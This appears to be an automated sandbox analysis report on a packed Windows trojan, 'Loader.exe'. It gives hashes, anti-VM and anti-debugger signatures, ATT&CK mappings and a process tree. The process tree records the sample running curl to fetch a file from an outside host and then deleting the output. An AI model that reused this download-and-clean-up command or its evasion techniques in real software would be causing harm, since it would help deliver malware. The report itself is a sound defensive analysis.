Overview

overview

9

Static

static

7

Loader.exe

windows7-x64

9

Loader.exe

windows10-2004-x64

9

Analysis

  • max time kernel
    28s
  • max time network
    33s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    29-03-2023 23:36

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Loader.exe

  • Size

    3.3MB

  • MD5

    aa27322c80872d70bcd3eabde5f88141

  • SHA1

    daef906c51350e74bc7eeace80e35b1bb2e2f443

  • SHA256

    4b08cc716f6f89415e2dc85e3c4eb626fcb9b0697f1596d5a27482b5a40d3227

  • SHA512

    12ad87b7ab61c92246ddae74eaa62223be948b57abcea1024b21a63bc0e1e6db66c3d911bbe30c857426602436a2a92479323513f25df9b683cda127a84e594e

  • SSDEEP

    49152:F/4780JJXqoYgkt9fT5mhaKG/iKz8Sn/Jypm+IUK7AYoL2ENttSIyUA8z/haouab:cfit/R6Kz8S0IjgvPxyfQ54Yfsxbhc

Score
9/10
evasionthemidatrojan

Malware Config

Signatures

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
    evasion
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Themida packer 5 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Loader.exe
    "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1696
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl --silent > OUTPUT.TXT https://auxy.gay/loader/loader.txt
      2⤵
        PID:588
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c del OUTPUT.TXT >NUL
        2⤵
          PID:1004

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Persistence

      Privilege Escalation

      Defense Evasion

      Virtualization/Sandbox Evasion

      1
      T1497

      Credential Access

      Discovery

      Query Registry

      2
      T1012

      Virtualization/Sandbox Evasion

      1
      T1497

      System Information Discovery

      2
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/1696-54-0x000000013F390000-0x000000013FCB5000-memory.dmp
        Filesize

        9.1MB

        Download
      • memory/1696-55-0x000000013F390000-0x000000013FCB5000-memory.dmp
        Filesize

        9.1MB

        Download
      • memory/1696-56-0x000000013F390000-0x000000013FCB5000-memory.dmp
        Filesize

        9.1MB

        Download
      • memory/1696-57-0x000000013F390000-0x000000013FCB5000-memory.dmp
        Filesize

        9.1MB

        Download
      • memory/1696-58-0x000000013F390000-0x000000013FCB5000-memory.dmp
        Filesize

        9.1MB

        Download